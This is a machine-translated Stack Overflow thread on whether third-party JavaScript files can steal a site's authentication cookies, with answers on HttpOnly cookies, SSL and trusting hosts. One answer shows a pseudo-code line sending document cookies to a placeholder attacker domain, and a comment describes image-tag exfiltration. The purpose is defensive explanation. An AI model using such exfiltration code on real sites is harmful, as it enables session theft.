14
含义如果我有一个网站,我链接到一个外部的.js文件,说jquery或一些小部件服务,他们可以很容易地通过身份验证cookie拉,然后登录为我正确?链接到外部.js文件时,这不是一个安全风险吗?
如果我在SSL下,该怎么办?
A
回答
0
不行,因为你的站点的cookie将只发送到您的域。
例如,当您的浏览器看到yoursite.com将发送身份验证cookie为yoursite.com。如果它也有做的jQuery不同的请求(针对.js文件的脚本),它不会派人yoursite.com饼干(但将发送jQuery的饼干 - 假设存在的话)。
记住每个资源是HTTP下的一个单独请求。
+2
下次仔细阅读他的问题。他特别谈到关于第三方服务器上的JS,答案是**“是的,这非常不安全”**。 – Christian 2011-03-15 14:49:15
21
如果包含Javascript或JSONP代码从另一个域,该代码具有完整的客户端功率,并且可以为所欲为。
它可以发送AJAX请求自动让你的用户做的事情,它可以偷取document.cookie。
如果您的验证cookie是HTTP-而已,它不能去偷去抢,但它仍然可以使用AJAX模拟用户。
决不包括来自你不信任域JS文件。
如果您的页面使用SSL,则所有的Javascript文件也必须使用SSL,否则攻击者可以修改未加密的Javascript来执行任何他想做的事情。
因此,如果SSL页面使用非SSL资源,浏览器将显示安全警告。
请注意,JSONP也不例外。
任何JSONP响应都可以完全访问您的DOM。
如果担心安全问题,请勿使用不受信任的JSONP API。
-7
Cookie是特定于域的,由相同的来源策略保护。
2
这取决于你是什么意思的“拉”。正如其他人在这里所说的,cookie只被发送到它的起源地。然而,第三方(含恶意)的文件,仍然可以通过执行像
// pseudo-code
cookie_send("http://badguy.tld/?"+document.cookies)
因此,只从信任的来源包括脚本(谷歌,Facebook等),一些JavaScript代码发送你的cookies回到自己的服务器
+0
代替伪代码:'document.write('');' –
Christian
2011-03-15 14:51:16
+0
是的,但是这个答案可能非常混乱。页面中的所有javascript都不能对任何站点执行ajax调用,而不是脚本标记的src与页面的起源不同。要将cookie发送到攻击者的域名,您必须执行类似Christian显示的操作,方法是在文档中添加一个img标记,并在其src的URL中使用编码的cookie,使用JSONP或iframe将数据发送回除页面域以外的域。我认为很多开发者会混淆脚本src的页面起源和url。 – chubbsondubs 2012-10-29 21:14:29
5
我只能同意SLaks和Haochi(+1和全部)。
这是极不安全,你应该永远不会做即使你信任关系的域。不要相信那些告诉你事实并非如此的答案,因为他们错了。
这就是为什么现在的链接,谷歌的CDN托管在Developer's Guide to Google Libraries API JavaScript库的字面所有是安全的HTTPS连接,即使加密所有的流量意味着即使谷歌的巨大的开销。
他们过去建议仅为使用HTTPS的网站使用HTTPS,现在在示例中根本没有HTTP链接。
问题是你可以信任谷歌和他们的CDN,但你永远不能相信一些可怜的schmuck的咖啡馆中的本地dns和路由器,你的访问者可能会连接到你的网站,而Google的CDN是明显的目标原因。
0
我不确定HttpOnly在所有浏览器中是否完全支持,所以我不会相信它可以防止攻击本身。
如果您担心第三方攻击者(即不是提供JS文件的网站)抓取cookie,请务必使用SSL和安全Cookie。
如果您的页面没有在SSL上运行,那么使用HttpOnly cookie实际上并不能防止中间人攻击,因为中间的攻击者可以拦截Cookie,无需假装成为您的域名。
如果您不信任外部.js文件的主机,请不要使用外部.js文件。一个外部的js文件可以重写整个页面的DOM,要求将一个CC提交给任何人,并让它看起来(对于普通用户)与你自己的页面相同,所以如果你有恶意.js文件。如果您不确定.js主机是否值得信赖,请在本地托管它的副本(并检查文件是否存在安全漏洞),否则根本不要使用它。通常我更喜欢后者。
在JQuery的特定情况下,如果找不到您喜欢的副本,请使用Google CDN上的副本。
+0
不只是普通用户。除非您使用网络嗅探器观看脚本发送被盗数据,否则一个好的脚本可能会欺骗_任何人。 – SLaks 2011-03-15 21:50:20
相关问题
- 1. AHAH是安全风险吗?
- 2. 可以image.src是一个安全风险?
- 3. WordPress - 安全风险?
- 4. 这是一个安全的连接吗?
- 5. 当链接到HTML文件时外部.js文件崩溃
- 6. 可见的.git文件夹存在安全风险吗?
- 7. 链接抓取系统的安全风险
- 8. Python龙卷风:这是安全的吗?
- 9. 查看公共文件,是否存在大的安全风险?
- 10. 个人使用泡椒安全风险
- 11. 多个提交按钮安全风险
- 12. CruiseControl.NET是开源项目的安全风险吗?
- 13. 内部HTTP调用是否存在安全风险
- 14. Silverlight文件上传:这是安全吗?
- 15. 这是一件安全的事情吗?
- 16. 如何将Thymeleaf链接到外部js文件?
- 17. JavaScript,通过JSON传递用户ID是一种安全风险?
- 18. 谷歌驱动器,Dropbox存储exe文件和所有这些不安全的文件?这不危险吗?
- 19. 外部样式表和js文件不在服务器链接
- 20. 链接到外部文件中的Android
- 21. 将外部JavaScript文件链接到HTML
- 22. 链接到外部edmx文件
- 23. JSF链接到外部文件
- 24. Mysql链接到外部资源:.zip一个图像文件
- 25. 在WEB-INF中显示文件路径的安全风险java
- 26. ASP MVC会话安全风险
- 27. Apache中auto_prepend_file的安全风险?
- 28. 启用MSDTC的安全风险
- 29. ElementRef安全风险角度2
- 30. PHP过滤器和安全风险
如果您使用的是SSL,则只能链接到SSL上的外部JS,否则访问者可能会收到警告。 – 2011-03-15 14:35:47
如果这是真的,每个网站都会有严重的危险 – 2011-03-15 14:36:08
@Josh:确实如此,除非Cookie是纯HTTP。 – SLaks 2011-03-15 14:36:38